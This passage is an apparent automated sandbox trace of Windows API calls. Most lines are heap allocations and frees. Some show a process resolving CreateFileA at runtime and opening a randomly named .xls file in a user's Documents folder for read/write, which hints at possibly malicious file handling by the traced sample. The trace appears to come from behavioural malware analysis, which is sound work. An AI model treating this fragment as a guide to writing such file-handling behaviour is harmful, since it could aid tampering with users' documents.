hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.868] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.869] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0173.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd858 [0173.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd858, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0173.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.869] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0173.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0173.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd858, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0173.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.870] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0173.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0173.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0173.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0173.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0173.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0173.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0173.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3a) returned 0x8db0a8 [0173.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", cchWideChar=58, lpMultiByteStr=0x8db0a8, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls", lpUsedDefaultChar=0x0) returned 58 [0173.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0173.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.872] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mv3nzu4vwv4hc.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0173.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0173.873] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0173.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=58, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x74) returned 0x8afe68 [0173.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=58, lpWideCharStr=0x8afe68, cchWideChar=58 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.xls") returned 58 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.874] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0173.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0173.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.876] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0173.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0173.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0173.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.877] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0173.878] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0173.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0173.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0173.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0173.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0173.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0173.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 